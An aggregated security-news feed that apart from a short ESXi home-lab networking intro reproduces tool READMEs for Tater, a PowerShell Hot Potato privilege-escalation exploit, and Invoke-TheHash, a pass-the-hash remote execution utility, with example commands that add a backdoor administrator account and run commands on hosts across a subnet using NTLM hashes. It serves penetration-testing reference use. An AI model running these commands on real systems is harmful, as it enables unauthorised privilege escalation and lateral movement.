Home Lab – Networking

In this post I will cover the basic set up of the basic building block network which is a simple flat network behind a router acting as Firewall, NAT, DHCP and VPN for the network.
The first action is to create a Virtual Switch that will be connectivity for all the virtual machines in this flat network. Almost all virtual solutions support having a virtual switch under one name or another. Since I choose for my home lab ESXi the commands shown will be for this platform but in general terms can be done the same with Hyper-V or XenServer. 
The main reason why I’m showing all the steps via command line is so that they can be automated later in a script if this is a process that will be repeated several times.

Link: http://www.darkoperator.com/blog/2017/2/4/home-lab-networking

Tater – A PowerShell implementation of the Hot Potato Windows Privilege Escalation Exploit

Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit. Included In p0wnedShell – https://github.com/Cn33liz/p0wnedShell PowerShell Empire – https://github.com/PowerShellEmpire/Empire PS>Attack – https://github.com/jaredhaight/psattack  Functions Invoke-Tater The main Tater function. Parameters IP – Specify a specific local IP address. An IP address will be selected automatically if this parameter is not used. SpooferIP – Specify an IP address for NBNS spoofing. This is needed when using two hosts to get around an in-use port 80 on the privesc target. Command – Command to execute as SYSTEM on the localhost. Use PowerShell character escapes where necessary. NBNS – Default = Enabled: (Y/N) Enable/Disable NBNS bruteforce spoofing. NBNSLimit – Default = Enabled: (Y/N) Enable/Disable NBNS bruteforce spoofer limiting to stop NBNS spoofing while hostname is resolving correctly. ExhaustUDP – Default = Disabled: (Y/N) Enable/Disable UDP port exhaustion to force all DNS lookups to fail in order to fallback to NBNS resolution. HTTPPort – Default = 80: Specify a TCP port for the HTTP listener and redirect response. Hostname – Default = WPAD: Hostname to spoof. WPAD.DOMAIN.TLD may be required by Windows Server 2008. WPADDirectHosts – Comma separated list of hosts to list as direct in the wpad.dat file. Note that localhost is always listed as direct. WPADPort – Default = 80: Specify a proxy server port to be included in the wpad.dat file. Trigger – Default = 1: Trigger type to use in order to trigger HTTP to SMB relay. 0 = None, 1 = Windows Defender Signature Update, 2 = Windows 10 Webclient/Scheduled Task TaskDelete – Default = Enabled: (Y/N) Enable/Disable scheduled task deletion for trigger 2. If enabled, a random string will be added to the taskname to avoid failures after multiple trigger 2 runs. Taskname – Default = Tater: Scheduled task name to use with trigger 2. If you observe that Tater does not work after multiple trigger 2 runs, try changing the taskname. RunTime – Default = Unlimited: (Integer) Set the run time duration in minutes. ConsoleOutput – Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn’t hang the shell. StatusOutput – Default = Enabled: (Y/N) Enable/Disable startup messages. ShowHelp – Default = Enabled: (Y/N) Enable/Disable the help messages at startup. Tool – Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit’s Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire Stop-Tater Function to manually stop Invoke-Tater. Usage To import with Import-Module: Import-Module ./Tater.ps1 To import using dot source method: . ./Tater.ps1 Examples Basic trigger 1 example Invoke-Tater -Trigger 1 -Command “net user tater Winter2016 /add && net localgroup administrators tater /add" Basic trigger 2 example Invoke-Tater -Trigger 2 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add" Two system setup to get around port 80 being in-use on the privesc target WPAD System – 192.168.10.100 – this system will just serve up a wpad.dat file that will direct HTTP traffic on the privesc target to the non-80 HTTP port Invoke-Tater -Trigger 0 -NBNS N -WPADPort 8080 -Command "null" Privesc Target – 192.168.10.101 Invoke-Tater -Command "net user Tater Winter2016 /add && net localgroup administrators Tater /add" -HTTPPort 8080 -SpooferIP 192.168.10.100 Screenshots Windows 7 using trigger 1 (NBNS WPAD Bruteforce + Windows Defender Signature Updates)Windows 10 using trigger 2 (WebClient Service + Scheduled Task)Windows 7 using trigger 1 and UDP port exhaustion Download Tater

Link: http://feedproxy.google.com/~r/PentestTools/~3/SUCHCkSSeEE/tater-powershell-implementation-of-hot.html

Invoke-TheHash – PowerShell Pass The Hash Utils

Invoke-TheHash contains PowerShell functions for performing NTLMv2 pass the hash WMI and SMB command execution. WMI and SMB services are accessed through .NET TCPClient connections. Local administrator privilege is not required client-side. Requirements Minimum PowerShell 2.0 Import Import-Module ./Invoke-TheHash.psd1 or . ./Invoke-WMIExec.ps1 . ./Invoke-SMBExec.ps1 . ./Invoke-TheHash.ps1 Functions Invoke-WMIExec Invoke-SMBExec Invoke-TheHash ConvertTo-TargetList Invoke-WMIExec WMI command execution function. Parameters: Target – Hostname or IP address of target. Username – Username to use for authentication. Domain – Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. Hash – NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. Command – Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. Sleep – Default = 10 Milliseconds: Sets the function’s Start-Sleep values in milliseconds. Example: Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command “command or launcher to execute" -verbose Screenshot: Invoke-SMBExec SMB (PsExec) command execution function supporting SMB1, SMB2, and SMB signing. Parameters: Target – Hostname or IP address of target. Username – Username to use for authentication. Domain – Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. Hash – NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. Command – Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to SCM on the target. CommandCOMSPEC – Default = Enabled: Prepend %COMSPEC% /C to Command. Service – Default = 20 Character Random: Name of the service to create and delete on the target. SMB1 – (Switch) Force SMB1. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the target. Sleep – Default = 150 Milliseconds: Sets the function’s Start-Sleep values in milliseconds. Example: Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose Screenshot: Invoke-TheHash Function for running Invoke-WMIExec and Invoke-SMBExec against multiple targets. Parameters: Type – Sets the desired Invoke-TheHash function. Set to either WMIExec or SMBExec. Targets – List of hostnames, IP addresses, or CIDR notation for targets. TargetsExclude – List of hostnames and/or IP addresses to exclude form the list or targets. PortCheckDisable – (Switch) Disable WMI or SMB port check. Since this function is not yet threaded, the port check serves to speed up he function by checking for an open WMI or SMB port before attempting a full synchronous TCPClient connection. PortCheckTimeout – Default = 100: Set the no response timeout in milliseconds for the WMI or SMB port check. Username – Username to use for authentication. Domain – Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. Hash – NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. Command – Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI or SCM on the target. CommandCOMSPEC – Default = Enabled: SMBExec type only. Prepend %COMSPEC% /C to Command. Service – Default = 20 Character Random: SMBExec type only. Name of the service to create and delete on the target. SMB1 – (Switch) Force SMB1. SMBExec type only. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the target. Sleep – Default = WMI 10 Milliseconds, SMB 150 Milliseconds: Sets the function’s Start-Sleep values in milliseconds. Example: Invoke-TheHash -Type WMIExec -Targets 192.168.100.0/24 -TargetsExclude 192.168.100.50 -Username Administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 Screenshot: ConvertTo-TargetList Converts Invoke-TheHash output to an array that contains only targets discovered to have Invoke-WMIExec or Invoke-SMBExec access. The output from this function can be fed back into the Targets parameter of Invoke-TheHash. Download Invoke-TheHash

Link: http://feedproxy.google.com/~r/PentestTools/~3/egsf10eEzi0/invoke-thehash-powershell-pass-hash.html